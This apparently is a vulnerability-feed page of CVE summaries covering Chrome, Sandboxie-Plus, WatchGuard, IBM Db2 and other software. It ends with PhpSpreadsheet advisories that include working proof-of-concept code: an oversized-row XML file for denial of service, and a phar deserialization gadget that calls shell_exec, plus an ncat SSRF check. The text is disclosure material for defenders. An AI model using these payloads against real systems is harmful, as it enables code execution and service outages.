Microsoft
Monthly
Remote code execution affects ChromeDriver in Google Chrome versions prior to 148.0.7778.96 on Windows platforms. Exploitation requires user interaction with a malicious HTML page, enabling remote attackers to achieve arbitrary code execution with high impact to confidentiality, integrity, and availability. Vendor-released patch available (version 148.0.7778.96). No active exploitation confirmed in CISA KEV at time of analysis, though CVSS base score of 8.8 reflects significant potential impact if users visit attacker-controlled content.
Local privilege escalation in Google Chrome Chromoting (prior to 148.0.7778.96) on Windows allows attackers to gain elevated OS-level privileges by tricking users into opening a malicious file. While CVSS scores this as high severity (7.8), real-world risk is tempered by local access and required user interaction (CVSS: AV:L/UI:R). Vendor patch available in version 148.0.7778.96 released May 2026. No active exploitation (CISA KEV) or public exploit code identified at time of analysis.
Local privilege escalation in Google Chrome's Windows updater component allows unprivileged users to gain SYSTEM-level access by exploiting insufficient input validation when the updater processes a specially crafted malicious file. Affects all Chrome versions on Windows prior to 148.0.7778.96. Google has released a patched version (148.0.7778.96). No active exploitation confirmed by CISA KEV at time of analysis, though the local attack vector and medium severity rating suggest potential for targeted attacks in enterprise environments where Chrome auto-update may be delayed.
Integer overflow in Chrome's Dawn graphics API (WebGPU) enables sandbox escape on Windows systems when users visit attacker-controlled web pages. Affects all Chrome versions prior to 148.0.7778.96 on Windows platforms. Vendor-released patch available in Chrome 148.0.7778.96 (confirmed by Google Stable Channel release). CVSS 8.8 reflects high impact but requires user interaction. No public exploit code or CISA KEV listing identified at time of analysis, indicating targeted or proof-of-concept stage exploitation risk rather than widespread active exploitation.
Local privilege escalation in Google Chrome Chromoting (remote desktop component) allows authenticated Windows users to gain elevated system privileges through a race condition exploit triggered by a malicious file. Fixed in Chrome 148.0.7778.96. The vulnerability requires user interaction and high attack complexity (AC:H), limiting automated exploitation despite the 7.5 CVSS score. No public exploit identified at time of analysis, and not listed in CISA KEV.
Insufficient policy enforcement in Chrome's WebUI on Linux, Mac, Windows, and ChromeOS prior to 148.0.7778.96 allows a remote attacker with a compromised renderer process to bypass site isolation via a crafted HTML page, potentially exposing sensitive cross-site data. The vulnerability requires user interaction (UI:R) and prior renderer compromise, limiting its standalone exploitability. Vendor-released patch available in version 148.0.7778.96.
Remote code execution in Google Chrome for Windows below version 148.0.7778.96 allows unauthenticated attackers to execute arbitrary code within Chrome's sandbox via specially crafted HTML pages exploiting a use-after-free vulnerability in the WebRTC implementation. CVSS score of 8.8 reflects high impact across confidentiality, integrity, and availability. EPSS data not provided, but Google's 'High' severity classification and immediate patch release indicate active concern. No CISA KEV listing or public POC identified at time of analysis, though the vulnerability is already patched.
Use-after-free memory corruption in Chrome Remote Desktop (Chromoting) on Windows enables local privilege escalation to SYSTEM via malicious file interaction. Attackers with local access can gain OS-level administrative control by inducing users to open specially crafted files processed by the Chromoting component. Patch available in Chrome 148.0.7778.96. No evidence of active exploitation (not in CISA KEV), but the local attack vector with low complexity and high impact warrants immediate patching for Windows Chrome deployments, especially in multi-user environments where privilege boundaries are critical.
Sandbox escape in Google Chrome on Windows allows attackers who have already compromised the renderer process to break out of Chrome's security sandbox via a use-after-free flaw in the Fullscreen API. Affects Chrome versions prior to 148.0.7778.96 on Windows platforms. Google has released a patch (version 148.0.7778.96) and rated this High severity. No evidence of active exploitation (not in CISA KEV) or public proof-of-concept code at time of analysis, though the vulnerability requires initial renderer compromise making it a second-stage exploitation vector.
Sandbox escape in Google Chrome on Windows versions prior to 148.0.7778.96 allows attackers who have already compromised the renderer process to break out of Chrome's security sandbox via type confusion in the Accessibility subsystem. The attack requires user interaction with a malicious webpage and successful renderer compromise as a prerequisite, representing a critical escalation path in multi-stage attacks. Vendor-released patch available in Chrome 148.0.7778.96. No active exploitation confirmed (not in CISA KEV), and no public exploit code identified at time of analysis.
Sandbox escape in Google Chrome for Windows versions prior to 148.0.7778.96 allows remote attackers who have already compromised the renderer process to break out of the Chrome sandbox via a use-after-free vulnerability in the Aura UI framework. The attack requires user interaction with a specially crafted HTML page and has high attack complexity (AC:H), but grants complete control over confidentiality, integrity, and availability with changed scope (S:C). No active exploitation confirmed in CISA KEV at time of analysis. EPSS data not provided, but the vulnerability targets a browser component with over 3 billion users globally.
Integer overflow in Chrome's ANGLE graphics layer (Mac/Windows) enables heap corruption via malicious web pages. Remote attackers can achieve arbitrary code execution by tricking users into visiting crafted HTML content. Google patched this in Chrome 148.0.7778.96, marking it high severity. Users must interact with the malicious page, but no authentication is required. EPSS data not available; no CISA KEV listing indicates exploitation not yet confirmed in the wild, though the Chromium bug tracker may contain additional context.
Origin confusion in Tauri's is_local_url() function on Windows and Android allows remote attackers to invoke local-only IPC commands by hosting content on a domain whose first subdomain matches the application's custom URI scheme. An attacker can register a domain like http://app.evil.com/ to bypass origin validation when the target application uses an app:// custom protocol, gaining unauthorized access to backend functionality intended only for the application's own frontend. A public proof-of-concept demonstrates successful command invocation through this bypass.
Local privilege escalation in Johnson Controls AC2000 physical access control system (versions 10.6-12.x) allows authenticated local users to execute arbitrary code with elevated privileges by manipulating DLL search paths. The CWE-427 uncontrolled search path vulnerability enables attackers with low-privilege local access to plant malicious libraries that AC2000 loads during startup or operation, achieving high confidentiality and integrity impact. No public exploit code identified at time of analysis, and CVSS 4.0 local attack vector (AV:L) with low privileges required (PR:L) indicates this requires initial system access but minimal complexity once achieved.
Local privilege escalation in WatchGuard Agent for Windows allows authenticated users to execute arbitrary code with elevated system privileges through DLL hijacking. The agent searches for dependencies in user-controllable directories, enabling attackers with standard user credentials to plant malicious DLLs that load when the service starts. WatchGuard has released version 1.25.03.0000 to address this uncontrolled search path vulnerability (CWE-427).
Hard-coded cryptographic key in WatchGuard Agent for Windows enables local authenticated attackers to inject malicious code into existing agent processes, achieving high-impact confidentiality, integrity, and availability compromise. WatchGuard Agent versions prior to 1.25.03.0000 are affected. CVSS v4.0 score of 8.5 reflects local attack vector with low complexity and low privilege requirements, though no active exploitation (KEV) or public POC has been identified at time of analysis. The vulnerability's CWE-321 classification indicates embedded cryptographic material that could be extracted and reused for process injection attacks.
Privilege escalation in WatchGuard Agent for Windows allows authenticated local users to gain NT AUTHORITY\SYSTEM privileges via incorrect permissions in the patch management component. CVSS 7.3 with low attack complexity and local attack vector. No active exploitation or public exploit code identified at time of analysis. EPSS data not available - real-world risk depends on defender endpoint deployment environments where local user access is already established.
Stack-based buffer overflow in WatchGuard Agent discovery service on Windows enables adjacent attackers without authentication to crash the agent via crafted network packets. CVSS 7.1 (High) reflects adjacent network attack vector with high integrity impact. The vulnerability targets the discovery service component used for agent enrollment and network communication. No CISA KEV listing or public exploit code identified at time of analysis, though the local network attack vector limits exposure to adjacent attackers.
Stack-based buffer overflow in WatchGuard Agent's discovery service allows adjacent network attackers to crash the agent service without authentication. Affects Windows installations prior to version 1.25.03.0000. Vendor patch released addressing the vulnerability. SSVC framework indicates no active exploitation observed and manual exploitation required. While CVSS 7.1 (High) reflects network-adjacent access with high availability impact, actual risk is limited to denial-of-service - no code execution or data compromise possible per the CVSS vector (VC:N/VI:N/VA:H).
NULL pointer dereference in the Linux kernel ixgbevf driver crashes Hyper-V guest VMs during device probe, causing a kernel panic and complete denial of service. The regression was introduced when commit a7075f501bd3 added a .negotiate_features callback to ixgbe_mac_operations and populated it for the standard ops table (ixgbevf_mac_ops) but omitted it from the Hyper-V-specific table (ixgbevf_hv_mac_ops), leaving that pointer NULL on Hyper-V guests. Any Linux system running on Microsoft Hyper-V with an Intel ixgbevf virtual NIC is subject to an automatic kernel crash at module load or boot; no public exploit has been identified at time of analysis and EPSS is 0.02%, reflecting a narrow but reliable impact on the specific deployment combination.
Off-by-one error in Velocidex Velociraptor before version 0.76.5 on Windows and Linux causes denial of service when parsing specially crafted .evtx files through the parse_evtx VQL plugin. Local attackers with user-level privileges can crash the Velociraptor process by uploading or providing malformed event log files, disrupting forensic investigations and incident response operations. The vulnerability requires user interaction (file upload/selection) but grants an attacker both integrity and availability impact despite the CVSS 4.4 (Medium) rating.
Unauthenticated CRLF injection in AVideo's Scheduler plugin allows remote attackers to inject arbitrary calendar events into ICS files served from the victim's trusted domain, enabling high-credibility calendar phishing attacks. The vulnerable endpoint accepts attacker-controlled parameters without sanitization, passes them through an incomplete escape function that does not neutralize carriage-return/line-feed bytes, and constructs RFC 5545-compliant ICS calendar files containing injected VEVENT blocks. Exploitation requires only that the Scheduler plugin be enabled (common default) and user interaction to import the malicious .ics file; no authentication or special configuration is needed. A vendor-released patch is available.
Remote code execution in Grav CMS versions prior to 2.0.0-beta.2 allows authenticated administrators to deploy malicious PHP web shells by uploading crafted ZIP files through the Direct Install tool at /admin/tools/direct-install. The vulnerability combines insufficient ZIP archive content validation (Zip Slip primitive via path traversal) with the design-level acceptance of arbitrary plugin PHP code. Publicly available exploit code exists, demonstrating automated login, nonce extraction, malicious plugin upload, and persistent shell deployment. CVSS 9.1 (Critical) reflects network-accessible RCE with scope change, though exploitation requires high privileges (admin role). No EPSS or KEV data available at time of analysis.
Unauthenticated SSRF in MagicMirror ≤2.35.0 allows remote attackers to proxy arbitrary HTTP requests through the server, accessing cloud metadata services (AWS/GCP/Azure IMDSv1), internal network resources, and localhost services via the unrestricted `/cors` endpoint. The vulnerability is compounded by environment variable expansion: attackers can exfiltrate server-side secrets (API keys, database credentials) by embedding placeholders like `**SECRET_API_KEY**` in URLs, which the server resolves from `process.env` before making the request. Vendor-released patch version 2.36.0 disables the CORS proxy by default and implements IP blocklisting when enabled. Publicly available exploit code exists (PoC provided in GitHub advisory GHSA-ph6f-2cvq-79hq). No active exploitation confirmed at time of analysis.
Server-Side Request Forgery (SSRF) in open-webSearch's fetchWebContent MCP tool enables remote unauthenticated attackers to fetch arbitrary private-network URLs and receive full response bodies. Two defects in the `isPrivateOrLocalHostname` validator combine to allow bypass: bracketed IPv6 literals (e.g., `[::ffff:7f00:1]`) are never validated because Node's URL.hostname preserves brackets and Node's isIP() returns 0 for bracketed strings, and DNS resolution is never performed so attacker-controlled hostnames resolving to RFC1918 addresses pass unchecked. When deployed with HTTP transport enabled (documented configuration, active in Docker image), the MCP server binds to 0.0.0.0:3000 with CORS origin='*' and no authentication, exposing the vulnerable tool to any network attacker. Fixed in version 2.1.7. No public exploit identified at time of analysis, but vendor-supplied proof-of-concept demonstrates full exploit chain against AWS EC2 metadata and localhost services.
Complete SSRF protection bypass in ssrfcheck allows remote attackers to reach all private IPv4 ranges including cloud metadata endpoints (169.254.169.254) by encoding targets as IPv4-mapped IPv6 addresses (e.g., http://[::ffff:127.0.0.1]/). Node.js WHATWG URL parser normalizes these addresses to compressed hex form before the library's dot-notation-only regex executes, rendering all private IP checks ineffective. EPSS score unavailable for this recent CVE (2026), but the attack requires no authentication (PR:N), has low complexity (AC:L), and affects the latest version (1.3.0) with no vendor-released patch identified at time of analysis. Publicly available exploit code exists with complete proof-of-concept and automated verification scripts confirmed on Node.js v20.20.2.
Path traversal in MinIO's ReadMultiple internode storage-REST endpoint allows authenticated cluster peers or root-credential holders to read arbitrary files from the host filesystem outside configured drive roots. Distributed-erasure (multi-node) deployments are affected; single-node standalone deployments are not. The vulnerability exists in all releases from RELEASE.2022-07-24T01-54-52Z through RELEASE.2025-09-07T16-13-09Z and has been fixed as of MinIO AIStor RELEASE.2024-10-23T19-38-07Z (with security patch RELEASE.2026-04-14T21-32-45Z recommended). No public exploit code or active exploitation has been identified at time of analysis.
Sandboxie-Plus versions 1.17.2 and earlier are vulnerable to privilege escalation via a Time-of-Check-to-Time-of-Use (TOCTOU) race condition during addon installation. When a user initiates addon installation through the SandMan interface, the UpdUtil.exe process runs as SYSTEM and stages files in the user-writable %TEMP%\sandboxie-updater directory. An unprivileged local attacker can exploit the window between hash verification and file extraction to replace the addon cabinet file with a malicious executable, resulting in arbitrary code execution as SYSTEM without UAC prompts. Patch version 1.17.3 addresses this flaw; no active exploitation has been publicly confirmed, though the attack is trivially reproducible given local access and user interaction.
Sandboxie-Plus versions 1.17.2 and earlier contain a cryptographic implementation flaw in SbieIniServer::HashPassword that reduces SHA-1 password hash entropy from 160 bits to 80 bits by incorrectly shifting the high nibble of each byte right by 8 instead of 4, combined with an unsalted hashing scheme. This makes leaked or backed-up EditPassword hashes significantly easier to brute-force, enabling attackers with local access and low privileges to recover plaintext passwords through offline attack. The vulnerability is fixed in version 1.17.3.
Stack-based buffer overflow in Sandboxie-Plus SbieSvc service enables sandboxed processes to escape isolation and execute code as SYSTEM. Affected versions 1.17.2 and earlier allow malicious sandboxed code to overflow a fixed 160-wide-character stack buffer in NamedPipeServer::OpenHandler via crafted named pipe open requests, bypassing the fundamental security boundary Sandboxie provides. Fixed in version 1.17.3. EPSS data unavailable, no CISA KEV listing or public exploit identified at time of analysis, but the security boundary violation represents a complete defeat of Sandboxie's core function.
Stack-based buffer overflow in Sandboxie-Plus ProcessServer handlers allows local authenticated attackers to execute arbitrary code as SYSTEM or crash the SbieSvc service. The vulnerability affects versions 1.17.2 and earlier, stems from unsafe wcscpy operations on unchecked WCHAR fields from service pipe requests, and has been patched in version 1.17.3. The service pipe's NULL DACL permits any local process to connect and trigger the flaw before authorization checks execute, enabling privilege escalation from low-privileged local accounts. No public exploit code identified at time of analysis, though the technical details in the GitHub advisory provide sufficient information for skilled attackers to develop exploits.
Local privilege escalation to SYSTEM in Sandboxie-Plus 1.17.2 and earlier allows low-privileged interactive users to trigger stack buffer overflow in SbieSvc service via unauthenticated IPC, bypassing sandbox isolation controls. The vulnerability exists in the RunSbieCtrl handler which processes crafted messages before security checks and copies unbounded input into a 128-character stack buffer. Fixed in version 1.17.3. EPSS data unavailable; not listed in CISA KEV at time of analysis, but publicly disclosed via GitHub Security Advisory with technical details sufficient for exploit development.
Stack buffer overflow in Sandboxie-Plus SbieSvc proxy service enables SYSTEM privilege escalation from sandboxed processes, including Security Hardened Sandboxes. Attackers chain an information disclosure (returning up to 32KB uninitialized stack memory with ASLR/stack cookie bypass) with an unbounded memcpy overflow in the GetRawInputDeviceInfoSlave IPC handler. Intel CET shadow stacks block ROP exploitation but not the information leak itself. Vendor-released patch available in version 1.17.3. No public exploit identified at time of analysis, but attack complexity is rated high (AC:H) with low privilege requirements (PR:L), making this viable for motivated attackers targeting sandbox environments.
INI injection in Sandboxie-Plus versions 1.17.2 and earlier enables any local low-privilege user to bypass EditAdminOnly and ConfigPassword protections, inject malicious directives into the global Sandboxie.ini file, create unrestricted sandbox sections, and escalate to SYSTEM privileges. The background service fails to authorize IPC messages for UserSettings_* sections and does not sanitize CRLF characters in MSGID_SBIE_INI_ADD_SETTING and MSGID_SBIE_INI_SET_SETTING parameters, allowing section header injection. Fixed in version 1.17.3 released by the vendor. No CISA KEV listing or public exploit identified at time of analysis, but technical details in GitHub advisory provide sufficient information for exploit development.
Local denial of service in Sandboxie 1.17.2 and earlier allows unprivileged processes inside Standard Sandbox configurations to crash the Windows kernel (BSOD) by sending malformed IOCTL requests to the SandboxieDriverApi kernel driver. Fixed in version 1.17.3 released by Sandboxie-Plus. Security Hardened Sandbox configurations are not affected. No active exploitation confirmed (not in CISA KEV), but the vulnerability is trivially exploitable by any process within an affected sandbox, enabling local attackers or malicious sandboxed applications to force immediate system-wide service disruption.
Server-Side Request Forgery in edx-enterprise 7.0.2-7.0.4 enables Enterprise Admins to steal cloud credentials and scan internal networks. Authenticated users with the Enterprise Admin role-typically delegated to training managers, not platform operators-can inject arbitrary URLs into SAMLProviderConfig.metadata_source and trigger server-side HTTP requests to internal infrastructure. Publicly available exploit code exists (proof-of-concept in GitHub advisory GHSA-64cv-vxpr-j6vc). Vendor-released patch: edx-enterprise 7.0.5. This mirrors a previously patched SSRF in openedx-platform (GHSA-328g-7h4g-r2m9), indicating recurring pattern in SAML metadata handling across Open edX components.
OpenClaw versions 2026.4.10 through 2026.4.13 fail to enforce sender allowlist checks in the Microsoft Teams SSO invoke handler, allowing attackers to bypass authorization controls and access Teams SSO sign-in functionality without proper validation. The vulnerability affects unauthenticated remote attackers and has been patched in version 2026.4.14, which routes SSO invoke handling through the standard sender authorization path used by normal message handling.
Local privilege escalation in Amazon WorkSpaces for Windows versions before 2.6.2034.0 enables authenticated low-privileged users to write arbitrary files to protected system locations, achieving SYSTEM-level access. The vulnerability exploits a race condition (CWE-367) in the Skylight Workspace Config Service's log rotation mechanism. No public exploit or active exploitation confirmed at time of analysis, but local access requirement limits attack surface to compromised user accounts or insider threats.
Argo Workflows executor logs artifact repository credentials in plaintext to pod logs during artifact operations, exposing S3 access/secret keys, GCS service account keys, Azure storage keys, and Git passwords. Users with Kubernetes RBAC permissions to read pod logs in the workflow namespace can extract these credentials directly from workflow execution logs. This vulnerability affects Argo Workflows v4.0.0 through v4.0.4 and represents an incomplete fix of CVE-2025-62157. Vendor-released patch (v4.0.5) is available with GitHub commit bdd40908 removing credential-bearing struct logging. No public exploit identified at time of analysis, though exploitation is trivial given the included working proof-of-concept YAML.
Prometheus monitoring system exposes Azure AD OAuth client secrets in plaintext via its /-/config HTTP API endpoint. Versions prior to 3.5.3 and 3.11.3 incorrectly type the client_secret field as a plain string instead of Prometheus's redacted Secret type, allowing remote unauthenticated attackers to retrieve sensitive Azure credentials from any exposed Prometheus instance configured for Azure AD remote write. The vulnerability has low exploitation complexity (CVSS AV:N/AC:L/PR:N) with 7.5 severity. Vendor-confirmed patches available in versions 3.5.3 and 3.11.3 (GitHub releases confirmed). EPSS data not provided; no CISA KEV listing indicating targeted exploitation campaigns at time of analysis.
Norton Secure VPN installed via Microsoft Store allows low-privilege Windows users to escalate to SYSTEM-level privileges by replacing files during the installation process, causing arbitrary file deletion. Cisco Talos discovered this TOCTOU (Time-of-Check Time-of-Use) race condition in the installer. No public exploit code or active exploitation confirmed at time of analysis, but the local attack vector with low complexity (CVSS AC:L) makes this highly exploitable once installation details are known.
SQL injection in code-projects Gym Management System in PHP allows authenticated remote attackers to manipulate the 'day' parameter in /index.php, enabling arbitrary SQL query execution with limited confidentiality and integrity impact. The vulnerability carries a CVSS score of 2.1 and requires prior authentication (PR:L); publicly available exploit code exists but active exploitation confirmation is absent from CISA KEV data.
WhatsApp for Windows prior to v2.3000.1032164386.258709 permits attachment spoofing via maliciously formatted documents with embedded NUL bytes in filenames, causing the application to display files as benign types while executing them as executables upon opening. The vulnerability requires user interaction to open a crafted attachment delivered over the network, enabling an attacker to achieve code execution with the privileges of the WhatsApp process. No public exploit code or active exploitation has been confirmed at time of analysis.
Division-by-zero denial of service in Linux kernel's Intel i915 DRM driver when loading on certain machines with DSC (Display Stream Compression) enabled in command mode. The driver incorrectly applies horizontal timing adjustments based on compression ratio in command mode, causing line_time_us to become zero and triggering a kernel panic. Affects Linux kernel versions 5.6 and later; patch available via stable kernel releases.
Cross-project privilege escalation in OpenStack Keystone (releases 13 through 29) lets a holder of an unrestricted application credential for one project mint an EC2-type credential targeting a different project, because POST /v3/credentials never validates that the caller-supplied project_id matches the authenticating app credential's project. Exchanging that EC2 credential at /v3/ec2tokens then yields a Keystone token scoped to the second project while retaining the original app_cred_id, enabling lateral movement across tenants. There is no public exploit identified at time of analysis and EPSS is very low (0.01%), but the authorization flaw (CWE-863) is confirmed and patched by upstream and distributors.
Denial of service in IBM Db2 11.5.0-11.5.9 and 12.1.0-12.1.4 allows authenticated users to crash the database server via improper neutralization of special elements in query logic. An attacker with valid database credentials can trigger the vulnerability remotely without user interaction, resulting in service unavailability. No active exploitation has been confirmed at time of analysis.
Denial of service in IBM Db2 11.5.0-11.5.9 and 12.1.0-12.1.3 for Linux, UNIX, and Windows allows authenticated users to crash the database server by submitting a specially crafted SQL query that triggers improper system resource allocation. An attacker with valid database credentials can exhaust resources and render the database unavailable to legitimate users without leaving data corruption or unauthorized access. No public exploit code has been identified, though the vulnerability requires only valid authentication and a standard SQL interface.
Denial of service in IBM Db2 11.5.0-11.5.9 and 12.1.0-12.1.3 allows authenticated users to crash the database server via improper neutralization of special elements in query logic when specific configurations are present. Attack requires valid database credentials and high attack complexity, limiting exploitation to insiders or users with legitimate access. Vendor has released patches addressing the underlying query parsing flaw.
Memory corruption in Absolute Secure Access Windows clients prior to version 14.50 allows local authenticated attackers to trigger denial of service by sending malformed data to an exposed API. The vulnerability requires local system access and authenticated privileges but can completely disable the security client, creating a critical availability risk for endpoint protection.
Buffer overflow in Absolute Secure Access Windows client versions prior to 14.50 allows local attackers with high privileges to trigger denial of service by exploiting improper memory handling. The vulnerability requires local access and elevated administrative privileges, limiting exploitation to authenticated users already possessing administrative control of the affected system. Vendor-released patch: version 14.50 or later.
Buffer overflow in Absolute Secure Access Windows client prior to version 14.50 allows local attackers to cause denial of service by triggering a system blue screen. The vulnerability requires local access to the affected system and can be exploited without user interaction or authentication. A vendor patch is available.
Local privilege escalation in Absolute Secure Access Windows client versions prior to 14.50 allows authenticated local attackers to escalate privileges to SYSTEM level by sending malformed API data. The vulnerability stems from an arbitrary read/write flaw in the client's API handling. Vendor patch is available (version 14.50). EPSS score not available for this recent CVE; no public exploit identified at time of analysis, and not currently listed in CISA KEV.
Command injection in Amazon ECS Agent on Windows allows authenticated attackers with task definition permissions to execute arbitrary shell commands with SYSTEM privileges on the underlying host. The vulnerability exists in the FSx Windows File Server volume mounting component (versions prior to 1.103.0), where username field input is not properly sanitized before being passed to OS commands. This affects AWS customers running Windows-based ECS container workloads with FSx volumes - exploitation requires IAM permissions to register ECS task definitions or write to credential stores (Secrets Manager/SSM Parameter Store) used by FSx configurations. Vendor-released patch: version 1.103.0. EPSS and KEV data not provided; no public exploit identified at time of analysis.
OpenTelemetry.Exporter.OpenTelemetryProtocol versions 1.8.0 through 1.15.2 allow local attackers to inject malicious telemetry data, disclose stored telemetry payloads, or exhaust system resources by exploiting an insecure default disk retry directory that falls back to the shared system temporary path when the required directory configuration is not explicitly set. On multi-user systems, this enables attackers with read or write access to the temp directory to craft blob files that the exporter will forward to the OTLP endpoint under the application's identity, or to read exported telemetry data between transient export failures.
Server-Side Request Forgery (SSRF) in n8n-mcp SDK allows authenticated remote attackers to access cloud metadata endpoints and internal network resources via IPv4-mapped IPv6 address bypass. Versions 2.47.4 through 2.47.13 fail to validate IPv6 addresses in the synchronous URL validator (SSRFProtection.validateUrlSync()), enabling attackers who control the n8nApiUrl parameter to bypass RFC1918, localhost, and cloud metadata protections using addresses like [::ffff:169.254.169.254]. The vulnerability is non-blind SSRF returning response bodies to the attacker, and forwards the n8nApiKey in the x-n8n-api-key header to attacker-controlled targets. Confirmed actively exploited (CISA KEV). Vendor-released patch: version 2.47.14. EPSS exploitation probability not provided but risk is elevated given KEV status and availability of exploit code in the GitHub advisory.
Weaver (Fanwei) E-office versions prior to 10.0_20221201 contain an unauthenticated arbitrary file upload vulnerability in the OfficeServer.php endpoint that allows remote attackers to upload. Rated critical severity (CVSS 9.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.
Remote denial of service via nil pointer dereference crashes GoBGP 4.3.0 when processing malformed BGP UPDATE messages containing unrecognized well-known path attributes. A single crafted UPDATE packet with an invalid Type Code (e.g., 0xEE or 0xFF) marked as well-known (Optional bit = 0) triggers a panic that terminates the entire BGP daemon process, not just the affected session. Publicly available exploit code exists with detailed proof-of-concept payloads confirmed by GitHub advisory GHSA-7235-89m6-f4px. Network-facing BGP deployments are at immediate operational risk despite CVSS 7.5, as BGP peering relationships make this trivially exploitable by any established peer.
## Summary The SpreadsheetML XML reader (`Reader\Xml`) does not validate the `ss:Index` row attribute against the maximum allowed row count (`AddressRange::MAX_ROW = 1,048,576`). An attacker can craft a SpreadsheetML XML file with `ss:Index="999999999"` on a `<Row>` element, which inflates the internal `cachedHighestRow` to ~1 billion. Any subsequent call to `getRowIterator()` without an explicit end row will attempt to iterate ~1 billion rows, causing CPU exhaustion and denial of service. ## Details In `src/PhpSpreadsheet/Reader/Xml.php`, the `loadSpreadsheetFromFile` method processes `<Row>` elements: ```php // Xml.php:397-402 if (isset($row_ss['Index'])) { $rowID = (int) $row_ss['Index']; // No validation against MAX_ROW } if (isset($row_ss['Hidden'])) { $rowVisible = ((string) $row_ss['Hidden']) !== '1'; $spreadsheet->getActiveSheet()->getRowDimension($rowID)->setVisible($rowVisible); } ``` The `$rowID` value read from `ss:Index` is cast to int with no upper bound check. It is then passed to `getRowDimension()`: ```php // Worksheet.php:1342-1351 public function getRowDimension(int $row): RowDimension { if (!isset($this->rowDimensions[$row])) { $this->rowDimensions[$row] = new RowDimension($row); $this->cachedHighestRow = max($this->cachedHighestRow, $row); } return $this->rowDimensions[$row]; } ``` This inflates `cachedHighestRow` to the attacker-controlled value. Additionally, at line 412, `$cellRange = $columnID . $rowID` is constructed and passed to `getCell()`, which calls `createNewCell()` (Worksheet.php:1294) and also sets `cachedHighestRow`. The `RowIterator` constructor uses `getHighestRow()` as its default end row: ```php // RowIterator.php:84-88 public function resetEnd(?int $endRow = null): static { $this->endRow = $endRow ?: $this->subject->getHighestRow(); return $this; } ``` With `cachedHighestRow` at ~1 billion, iterating over rows causes CPU exhaustion. The `DefaultReadFilter` provides no protection - it returns `true` for all cells. Even without the `Hidden` attribute, any cell data within the row still uses the inflated `$rowID` at line 412, so the `ss:Hidden` attribute is not required to trigger the vulnerability. ## PoC 1. Create `poc.xml`: ```xml <?xml version="1.0"?> <?mso-application progid="Excel.Sheet"?> <Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet" xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet"> <Worksheet ss:Name="Sheet1"> <Table> <Row ss:Index="999999999" ss:Hidden="1"/> <Row><Cell><Data ss:Type="String">test</Data></Cell></Row> </Table> </Worksheet> </Workbook> ``` 2. Load and iterate: ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; $reader = IOFactory::createReader('Xml'); $spreadsheet = $reader->load('poc.xml'); $sheet = $spreadsheet->getActiveSheet(); echo "Highest row: " . $sheet->getHighestRow() . "\n"; // Outputs: Highest row: 1000000000 // This loop will attempt ~1 billion iterations → CPU exhaustion foreach ($sheet->getRowIterator() as $row) { // Never completes } ``` ## Impact Any PHP application that processes user-uploaded SpreadsheetML XML files using PhpSpreadsheet is vulnerable. An attacker can cause denial of service by: - Exhausting server CPU with a single small XML file (~300 bytes) - Blocking the PHP worker process, potentially affecting all concurrent users - Triggering PHP max_execution_time limits that still consume resources before killing the process The attack requires no authentication - only the ability to upload or cause the application to process a crafted SpreadsheetML file. ## Recommended Fix Add MAX_ROW validation after reading the `ss:Index` attribute in `src/PhpSpreadsheet/Reader/Xml.php`: ```php // After line 398: if (isset($row_ss['Index'])) { $rowID = (int) $row_ss['Index']; if ($rowID > AddressRange::MAX_ROW) { $rowID = AddressRange::MAX_ROW; } } ``` Add the necessary import at the top of the file: ```php use PhpOffice\PhpSpreadsheet\Cell\AddressRange; ``` The same validation should also be applied to the `ss:Index` attribute on `<Cell>` elements (line 409) for the column dimension.
The usage of `is_file`, used to verify if the `$filename` is indeed an actual file, by all(?) `Reader` implementations (inside the helper function `File::assertFile`) is php-wrapper aware, for any [php wrappers](https://www.php.net/manual/en/wrappers.php) implementing `stat()`. The 3 wrappers `ftp://`, `phar://` and `ssh2.sftp://`, all satisfy this requirement - 2 of which are shown in the PoC below. This results in a SSRF, at "best", and RCE at worse. This was tested against the `latest` release - but the issue seems to go back a while from a first quick check (still present in `v1.30.2`). ## PoC To reproduce the vulnerable behavior, the following scripts were used: `php.ini` file, only needed to build the malicious phar, not necessary to exploit on a deployed instance of the library: ```ini phar.readonly=0 ``` `make_phar.php` to create the malicious file: ```php <?php // php -c php.ini make_phar.php class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $pop = new GadgetClass('touch /tmp/poc.txt'); $phar = new Phar('exploit.phar'); $phar->startBuffering(); $phar->setStub('<?php __HALT_COMPILER(); ?>'); $phar->addFromString('whatever', 'dummy content'); $phar->setMetadata($pop); $phar->stopBuffering(); rename('exploit.phar', 'exploit.xlsx'); // optional echo "exploit.xlsx created \n"; ``` `test.php` showcases the unsafe pattern: ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; class GadgetClass { public $data; function __construct($d) { $this->data = $d; } function __destruct() { shell_exec($this->data); } } $filename = $argv[1] ?? null; if (!$filename) { echo "Usage: php test.php <path>\n"; echo " e.g. php test.php phar://exploit.xlsx/whatever\n"; exit(1); } echo "Calling IOFactory::load('" . $filename . "')\n"; try { $spreadsheet = IOFactory::load($filename); var_dump($spreadsheet); } catch (Throwable $e) { echo "Vuln has still triggered even if exception triggers.\n"; } ``` ### RCE Run the PoC (for RCE): ```bash php -c php.ini make_phar.php && php test.php phar://exploit.xlsx/test; ls -lah /tmp/poc.txt ``` The file `/tmp/poc.txt` should now be present on disk. > Note: the vuln still triggers if the file pointed to inside the phar does not exist/is not supported (html, xlsx, etc...). This means an attacker could "silently" trigger the vuln without leaving any error logs if the file inside the phar exists and is supported instead. ### SSRF Run the PoC (for SSRF): ```bash ncat -lvp 21 #run on another terminal php test.php ftp://127.0.0.1:21/test ``` Observe a connection is made to `127.0.0.1` on port `21`. ## Root Cause Analysis Following the API exposed by the library, using `IOFactory::load`, the code proceeds as follows: ```php IOFactory::load($filename) -> IReader::load($filename, $flags) -> IReader::loadSpreadsheetFromFile($filename) -> File::assertFile($filename, ...) -> is_file($filename); ``` The one obvious gadget that was found is guarded via `__unserialize` (or `__wakeup` in older versions) in the `XMLWriter` class, making it not possible to use the phar deserialization as a standalone attack vector using just this library - it is still viable to create "POP" gadget chains via other classes which may be available in real-world deployment scenarios. ```php public function __destruct() { // Unlink temporary files // There is nothing reasonable to do if unlink fails. if ($this->tempFileName != '') { @unlink($this->tempFileName); } } /** @param mixed[] $data */ public function __unserialize(array $data): void { $this->tempFileName = ''; throw new SpreadsheetException('Unserialize not permitted'); 